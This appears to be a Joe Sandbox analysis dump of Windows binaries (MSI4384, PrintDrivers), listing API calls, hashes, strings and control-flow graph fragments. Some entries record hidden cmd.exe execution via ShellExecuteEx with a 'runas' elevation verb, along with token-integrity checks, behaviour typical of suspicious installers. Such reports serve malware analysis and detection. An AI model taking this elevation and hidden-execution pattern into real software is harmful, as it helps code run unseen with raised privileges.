                                                                    • Instruction ID: e01e2213fed61b09ff196732861ea21d450c8a0d26a4d8090fc63d00219b54bd
                                                                    • Opcode Fuzzy Hash: 73411f2fc0a4316a245022b91df4a643e256ad7e9243c84b52907d559c8b69d4
                                                                    • Instruction Fuzzy Hash: DE61BE71D00218ABDF05EFE4D885AEDBBB5FF08304F10451AE406AB391EB399A15CB84
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00443977
                                                                    • _swprintf.LIBCMT ref: 004439EF
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::_Lockit.LIBCPMT ref: 0042B81D
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::_Lockit.LIBCPMT ref: 0042B840
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B868
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B911
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 1487807907-1402515088
                                                                    • Opcode ID: 677591d697ec0b487e154d3b3c5763849b7eef4d7afa9843b6daba678b9c2003
                                                                    • Instruction ID: ee90ff648f69ad0bc4b3580911ab90eece4d48ed5ec8bf51cb2851d898f2c5d5
                                                                    • Opcode Fuzzy Hash: 677591d697ec0b487e154d3b3c5763849b7eef4d7afa9843b6daba678b9c2003
                                                                    • Instruction Fuzzy Hash: 8961C171D00258AFDF05DFE4D844AEDBBB9FF48704F10451AE502AB291EB39AA15CF84
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldiv
                                                                    • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                    • API String ID: 3732870572-1956417402
                                                                    • Opcode ID: fd72befaecc01382a2ca880e9c10c7ccad2f2020644411d5cf47c6c962ff3dca
                                                                    • Instruction ID: 2ae7c835f29d326b5f2d16e3c7641d9c696327418c612a2d749991b027a57952
                                                                    • Opcode Fuzzy Hash: fd72befaecc01382a2ca880e9c10c7ccad2f2020644411d5cf47c6c962ff3dca
                                                                    • Instruction Fuzzy Hash: C651D470A04288AFFF25CFBD88417AFBBF5AF45310F14445FE491A7341DAB899428B59
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00448297
                                                                    • _swprintf.LIBCMT ref: 0044830F
                                                                      • Part of subcall function 0042C840: std::_Lockit::_Lockit.LIBCPMT ref: 0042C86D
                                                                      • Part of subcall function 0042C840: std::_Lockit::_Lockit.LIBCPMT ref: 0042C890
                                                                      • Part of subcall function 0042C840: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C8B8
                                                                      • Part of subcall function 0042C840: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C961
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 1487807907-1402515088
                                                                    • Opcode ID: d929f01668e800bd3d676facc3f23e86cc39a7e612b969013a1417c9482c1fa3
                                                                    • Instruction ID: 08ca1445ad7c7b416f74f2d7a564ff7381489247e935359fcfea87fe6d488e92
                                                                    • Opcode Fuzzy Hash: d929f01668e800bd3d676facc3f23e86cc39a7e612b969013a1417c9482c1fa3
                                                                    • Instruction Fuzzy Hash: 4761AD71E00218AFDF09DFE4D845AEEBBB5FF08304F10455EE506AB291EB399945CB88
                                                                    APIs
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0042FF1C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Concurrency::cancel_current_task
                                                                    • String ID: false$true
                                                                    • API String ID: 118556049-2658103896
                                                                    • Opcode ID: 088484fcbf5a1e1059c76630b582b453641a39e23a84f076543adf6f9dbf141f
                                                                    • Instruction ID: 3d5706d47bfbd756578115621fa82b7b624988b1446361854469069d6bafbe10
                                                                    • Opcode Fuzzy Hash: 088484fcbf5a1e1059c76630b582b453641a39e23a84f076543adf6f9dbf141f
                                                                    • Instruction Fuzzy Hash: A251B4B1D003489FDB10DFA4C941BEEB7B8FF49304F14826EE845A7282E779A949CB55
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \\?\$\\?\UNC\
                                                                    • API String ID: 0-3019864461
                                                                    • Opcode ID: 4aa39e8d3053721ee4f6ff2b9307323dc69ec3954cffa6d9f6b09924fef695f1
                                                                    • Instruction ID: 0318d003217593dc4b7f96ce433d49812e863f5dc7a2e931a5d4b2b5be9c0ab7
                                                                    • Opcode Fuzzy Hash: 4aa39e8d3053721ee4f6ff2b9307323dc69ec3954cffa6d9f6b09924fef695f1
                                                                    • Instruction Fuzzy Hash: EE51D1B0E003149BDB24CF68D945BAEB7B4FF55318F50451EE441A7380D7B9AD88CB98
                                                                    APIs
                                                                      • Part of subcall function 0045CCB0: HeapFree.KERNEL32(00000000,00000000,?,00463726,?,00000000,?,?,004639C7,?,00000007,?,?,00463E96,?,?), ref: 0045CCC6
                                                                      • Part of subcall function 0045CCB0: GetLastError.KERNEL32(?,?,00463726,?,00000000,?,?,004639C7,?,00000007,?,?,00463E96,?,?), ref: 0045CCD1
                                                                    • ___free_lconv_mon.LIBCMT ref: 00463D41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID: ("H$D!H
                                                                    • API String ID: 4068849827-4018331140
                                                                    • Opcode ID: 8b15a4c1e4031f574213b337e1b425d7f6d2e68298eb7f0449f6afa881b5e27a
                                                                    • Instruction ID: 6b8d5bd4e32f2af0125a3a5f21f8438148589d68a10e3d3e6ac118072b1e9276
                                                                    • Opcode Fuzzy Hash: 8b15a4c1e4031f574213b337e1b425d7f6d2e68298eb7f0449f6afa881b5e27a
                                                                    • Instruction Fuzzy Hash: F9319C716007409FEB21AF79D841B5773E9AF0035AF10441FE85887252EF39EE84C729
                                                                    APIs
                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 0044D44B
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: 94c16877827929975e52cd9387917ddb710e98e2ab9a64114f2162572f7fa051
                                                                    • Instruction ID: 09a6c9bb6684d171f3c3f11aecfb17625d48a27784c3f4ce51119131d7329cb3
                                                                    • Opcode Fuzzy Hash: 94c16877827929975e52cd9387917ddb710e98e2ab9a64114f2162572f7fa051
                                                                    • Instruction Fuzzy Hash: 77418C71D00209AFEF16DF98CD81AEE7BB5FF48308F14819AF90467211D739A960DB59
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00448167
                                                                      • Part of subcall function 0042C840: std::_Lockit::_Lockit.LIBCPMT ref: 0042C86D
                                                                      • Part of subcall function 0042C840: std::_Lockit::_Lockit.LIBCPMT ref: 0042C890
                                                                      • Part of subcall function 0042C840: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C8B8
                                                                      • Part of subcall function 0042C840: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C961
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                    • String ID: 0123456789-$0123456789-
                                                                    • API String ID: 2088892359-2494171821
                                                                    • Opcode ID: 661c3396ef0e07b2d474561f6440614b613327bcd4d70e8e981d5711191c6a63
                                                                    • Instruction ID: 00d64df92202f8045887c6db33c5fcb1ec0423a89fcf8d618e57498ace614693
                                                                    • Opcode Fuzzy Hash: 661c3396ef0e07b2d474561f6440614b613327bcd4d70e8e981d5711191c6a63
                                                                    • Instruction Fuzzy Hash: 5F413931E001189FDF15EFA8D8919EE7BB5BF09314F10409EF811AB251DA389A16CB59
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00443517
                                                                      • Part of subcall function 0043A71C: __EH_prolog3.LIBCMT ref: 0043A723
                                                                      • Part of subcall function 0043A71C: std::_Lockit::_Lockit.LIBCPMT ref: 0043A72D
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: H_prolog3H_prolog3_LockitLockit::_std::_
                                                                    • String ID: %.0Lf$0123456789-
                                                                    • API String ID: 79917597-3094241602
                                                                    • Opcode ID: d4984a531732855606f4dd12892feee75bdc8aec7f8a7753a14a71ed2a78a2b4
                                                                    • Instruction ID: 377c7ce648a755e87bde54a0850ab5c2c33e92a1733c71abb43e1899b0aeb01c
                                                                    • Opcode Fuzzy Hash: d4984a531732855606f4dd12892feee75bdc8aec7f8a7753a14a71ed2a78a2b4
                                                                    • Instruction Fuzzy Hash: 43417B71900218EFCF15EFA4C9819EE7BB5BF08718F10005EF911AB255DB389E55CB99
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00443847
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::_Lockit.LIBCPMT ref: 0042B81D
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::_Lockit.LIBCPMT ref: 0042B840
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B868
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B911
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                    • String ID: 0123456789-$0123456789-
                                                                    • API String ID: 2088892359-2494171821
                                                                    • Opcode ID: d0e15fbecd8d64809b9315dce1f45d970918061a0be3b9b89a1f88a93ca13285
                                                                    • Instruction ID: db89e245c66d280be1fcddb7f6c7d3f38f863427928518629011aef8be29ab2d
                                                                    • Opcode Fuzzy Hash: d0e15fbecd8d64809b9315dce1f45d970918061a0be3b9b89a1f88a93ca13285
                                                                    • Instruction Fuzzy Hash: 19418C71A00218DFCF15EFA4D9819EEBBB5FF08714F10005AF811AB251DB38AE55CB59
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _swprintf
                                                                    • String ID: %$+
                                                                    • API String ID: 589789837-2626897407
                                                                    • Opcode ID: 264951aec13ca3467353513c8002ff562d908dcc0f218bf2b4b28f093d3ed403
                                                                    • Instruction ID: b71e5364e07b39e8d590456432b46ce15cb55711d8700c98b6acb02befab2df7
                                                                    • Opcode Fuzzy Hash: 264951aec13ca3467353513c8002ff562d908dcc0f218bf2b4b28f093d3ed403
                                                                    • Instruction Fuzzy Hash: 402144725082848FD701CF08EC85F9BBBE9AF89308F04411EFA8547292C738D908C7A6
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _swprintf
                                                                    • String ID: %$+
                                                                    • API String ID: 589789837-2626897407
                                                                    • Opcode ID: f2578ce1505f464aa780b99718992cd6a81cad126b7957c9fd2b73a9934da4c8
                                                                    • Instruction ID: 2b3a272dd367121918055af2d17a4fb17767e28929a6cb30fa01452b60d1ddf1
                                                                    • Opcode Fuzzy Hash: f2578ce1505f464aa780b99718992cd6a81cad126b7957c9fd2b73a9934da4c8
                                                                    • Instruction Fuzzy Hash: C821223160C3409FDB15CE28DC40F9BBBEAAB89314F04855EF98587381C779D90ACBA6
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _swprintf
                                                                    • String ID: %$+
                                                                    • API String ID: 589789837-2626897407
                                                                    • Opcode ID: b33171a02fcc065d5639849d3a75b85f46c38fa63088e4410151be3e2eddac0f
                                                                    • Instruction ID: ed9c2a371f53c9a09aa3ebd3e02b597e402f51e54c9b6071884bfe02a98b96ed
                                                                    • Opcode Fuzzy Hash: b33171a02fcc065d5639849d3a75b85f46c38fa63088e4410151be3e2eddac0f
                                                                    • Instruction Fuzzy Hash: 382107316083449FD711CE28DC81B9B7BEAAF89314F04851EF99587381C779E90ACBA7
                                                                    APIs
                                                                    • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00428356
                                                                    • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,F3E52339), ref: 004283C5
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ConvertFreeLocalString
                                                                    • String ID: Invalid SID
                                                                    • API String ID: 3201929900-130637731
                                                                    • Opcode ID: 87be27dc2d7b60c4a19ed48b3c9b810b48e1c263081f5ba0972b1995276568c9
                                                                    • Instruction ID: bb784d3544b600b1a27f2083a0fa5c46e1f441931a68cf248f4c43bc2e17b977
                                                                    • Opcode Fuzzy Hash: 87be27dc2d7b60c4a19ed48b3c9b810b48e1c263081f5ba0972b1995276568c9
                                                                    • Instruction Fuzzy Hash: 1921D271A003159BDB14CF58D815BAFBBF8FF84B14F50465EE801A7381EBBA6A448BD4
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042C40B
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042C46E
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 3988782225-1405518554
                                                                    • Opcode ID: bf3037c5bafd30500f4da69ad2ae0614c02e57d7cc33b17c93cfd36ccb48722d
                                                                    • Instruction ID: 3dd4bfb7d5c68d821141f7dbd699e8e1366c9d27b3e6f2decf0ab0d515d5b067
                                                                    • Opcode Fuzzy Hash: bf3037c5bafd30500f4da69ad2ae0614c02e57d7cc33b17c93cfd36ccb48722d
                                                                    • Instruction Fuzzy Hash: EA2124B0805784EED721CF69C90478BBFF4EF19714F108A9ED09597B81D3B9A604CBA5
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: H_prolog3_
                                                                    • String ID: false$true
                                                                    • API String ID: 2427045233-2658103896
                                                                    • Opcode ID: 7fd8e849bce70241a135b236ac64ad463dfd3007f9189bf2f01fc3ef051093f5
                                                                    • Instruction ID: 3a52077450ae3834a4da6630aa80224d1e5035c7383ef5823a65d12f4858f8bd
                                                                    • Opcode Fuzzy Hash: 7fd8e849bce70241a135b236ac64ad463dfd3007f9189bf2f01fc3ef051093f5
                                                                    • Instruction Fuzzy Hash: 9511B1B1900740AEC725EF75D812B8AB7F4AB09300F04D91FE1A687341EB38E504CB59
                                                                    APIs
                                                                    • AcquireSRWLockExclusive.KERNEL32(00483B74,?,?,?,00422646,00484714,F3E52339,?,?,0046B16D,000000FF,?,00421A07), ref: 004495B3
                                                                    • ReleaseSRWLockExclusive.KERNEL32(00483B74,?,?,00422646,00484714,F3E52339,?,?,0046B16D,000000FF,?,00421A07,?,?,?,F3E52339), ref: 004495ED
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                    • String ID: t;H
                                                                    • API String ID: 17069307-3893116676
                                                                    • Opcode ID: 2ba1dc4a1ca8aa99cff28ffd911f7051c1eab897615898893fc41f89e41c5313
                                                                    • Instruction ID: 59fe798fd9767f30de85bc46b56c7c5cf836bdb23038d8b7b4d9c08705fa774b
                                                                    • Opcode Fuzzy Hash: 2ba1dc4a1ca8aa99cff28ffd911f7051c1eab897615898893fc41f89e41c5313
                                                                    • Instruction Fuzzy Hash: 81F02732100101EBD7215F15D804A6A77F4FB42736F30063FE8A543390C7781C42EB1A
                                                                    APIs
                                                                      • Part of subcall function 00431020: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,F3E52339,?,0046B110,000000FF), ref: 00431047
                                                                      • Part of subcall function 00431020: GetLastError.KERNEL32(?,00000000,00000000,F3E52339,?,0046B110,000000FF), ref: 00431051
                                                                    • IsDebuggerPresent.KERNEL32(?,?,0047ECF8), ref: 00432378
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,0047ECF8), ref: 00432387
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00432382
                                                                    Similarity
                                                                    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 3511171328-631824599
                                                                    • Opcode ID: 26f8ebab5883fa38ed60feba729f355121e6176b6f938b93e9e216a39beda4fa
                                                                    • Instruction ID: 66bed2f2407c91b8e416fc163adeb1db7b508cfc14152b42ce79fc2161c7cacb
                                                                    • Opcode Fuzzy Hash: 26f8ebab5883fa38ed60feba729f355121e6176b6f938b93e9e216a39beda4fa
                                                                    • Instruction Fuzzy Hash: BAE0ED702007528FD360AF35F6047467AE4AF49744F00993FE886C6651E7FCE4488B5A
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,00000028,F3E52339,?,00000000,?,?,?,0046BB00,000000FF,?,004264FE,00000000,?), ref: 00426DD4
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,0046BB00,000000FF,?,004264FE,00000000), ref: 00426E8A
                                                                    • LocalFree.KERNEL32(?,F3E52339,00000000,0046B110,000000FF,?,00000000,00000000,0046BB00,?,F3E52339), ref: 00426F1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Free$Alloc
                                                                    • String ID:
                                                                    • API String ID: 3098330729-0
                                                                    • Opcode ID: fcd215298b63b42fca2ed53df20059b602437f38bdacc0d916965c743684c16b
                                                                    • Instruction ID: 3b2afa0a68da49750cdfe3d5398dacb7178196272d0e5158dcfb255e1c31721f
                                                                    • Opcode Fuzzy Hash: fcd215298b63b42fca2ed53df20059b602437f38bdacc0d916965c743684c16b
                                                                    • Instruction Fuzzy Hash: 0451B4B5B002159FDB18CF68D985BAEBBB5FB08314F61462EE815E3380D735AD04CB98
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,00000000,?,?,00000000,?), ref: 00424B56
                                                                    • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,00000000,?,?,00000000,?), ref: 00424BA0
                                                                    • LocalFree.KERNEL32(7FFFFFFE,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00424C22
                                                                    • LocalFree.KERNEL32(00000000,F3E52339,00000000,00000000,Function_0004B020,000000FF,?,?,00000000,?,?,00000000,?), ref: 00424CAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Local$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 2012307162-0
                                                                    • Opcode ID: 59a04b63619e00789a4857972edbcc58d2b0a7cd9c00cabc1b3980a9d1c55450
                                                                    • Instruction ID: ce6d07d9ef4ca01c8c12fee6897c2fec2c8236e75299513ea1ce2be4c4757405
                                                                    • Opcode Fuzzy Hash: 59a04b63619e00789a4857972edbcc58d2b0a7cd9c00cabc1b3980a9d1c55450
                                                                    • Instruction Fuzzy Hash: 155114726042209FC714DF29E881A6BB7E8EB89354F51063FF855D7390E734ED048B99

                                                                    Execution Graph

                                                                    Execution Coverage:1.2%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0.3%
                                                                    Total number of Nodes:327
                                                                    Total number of Limit Nodes:7

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 005867FA
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00586807
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00586827
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCurrentHandleOpenToken
                                                                    • String ID: S-1-5-18
                                                                    • API String ID: 4052875653-4289277601
                                                                    • Opcode ID: 262e041ad55ce59233d30bade9098f73894892596bf6805c3e2aaf58b1a4f372
                                                                    • Instruction ID: bd56649f936097a3f9d4e22439b3a5840790728d6f2afd22943ca774d1a71c5f
                                                                    • Opcode Fuzzy Hash: 262e041ad55ce59233d30bade9098f73894892596bf6805c3e2aaf58b1a4f372
                                                                    • Instruction Fuzzy Hash: C102A03090065ACFDB14EFA8C959AAEBFB5FF45314F148258DC52BB295EB309E05CB90

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,00000000), ref: 005853C8
                                                                    • GetForegroundWindow.USER32(00000000,?,?,00000000), ref: 0058544B
                                                                    • ShellExecuteExW.SHELL32(?), ref: 0058552B
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00585565
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00585593
                                                                    • GetExitCodeProcess.KERNELBASE(?,?), ref: 0058559D
                                                                    • CloseHandle.KERNEL32(?), ref: 005855A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ExecuteShell$CloseCodeDirectoryExitForegroundHandleObjectProcessSingleWaitWindowWindows
                                                                    • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Tv]$Verb:<$Visible$Window Visibility:$open$runas
                                                                    • API String ID: 3871407861-1792372284

                                                                    Control-flow Graph
                                                                    control_flow_graph 248 5856c0-5856df GetCurrentProcess OpenProcessToken 249 5856e1-5856e6 248->249 250 5856e7-585714 GetTokenInformation 248->250 251 58571e-58572e CloseHandle 250->251 252 585716-58571b 250->252 252->251
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000008,?,F3F544E4), ref: 005856D0
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 005856D7
                                                                    • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 0058570C
                                                                    • CloseHandle.KERNEL32(?), ref: 00585722
                                                                    Similarity
                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                    • String ID:
                                                                    • API String ID: 215268677-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCommandLineW.KERNEL32(F3F544E4,?,?,?,?,?,?,?,?,?,005C7685,000000FF), ref: 00590478
                                                                      • Part of subcall function 00582E30: LocalAlloc.KERNEL32(00000040,00000000), ref: 00582E4D
                                                                    • ExitProcess.KERNEL32 ref: 00590541
                                                                      • Part of subcall function 00586350: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 005863CE
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                    • String ID: Full command line:
                                                                    • API String ID: 1878577176-831861440

                                                                    Control-flow Graph
                                                                    control_flow_graph 285 585b30-585bac GetTokenInformation 286 585bae-585bb7 GetLastError 285->286 287 585c10-585c23 285->287 286->287 288 585bb9-585bc7 286->288 289 585bc9-585bcc 288->289 290 585bce 288->290 291 585bfb 289->291 292 585bfe-585c0a GetTokenInformation 290->292 293 585bd0-585bd7 290->293 291->292 292->287 294 585bd9-585be5 call 585dc0 293->294 295 585be7-585bf8 call 5a5f20 293->295 294->292 295->291
                                                                    APIs
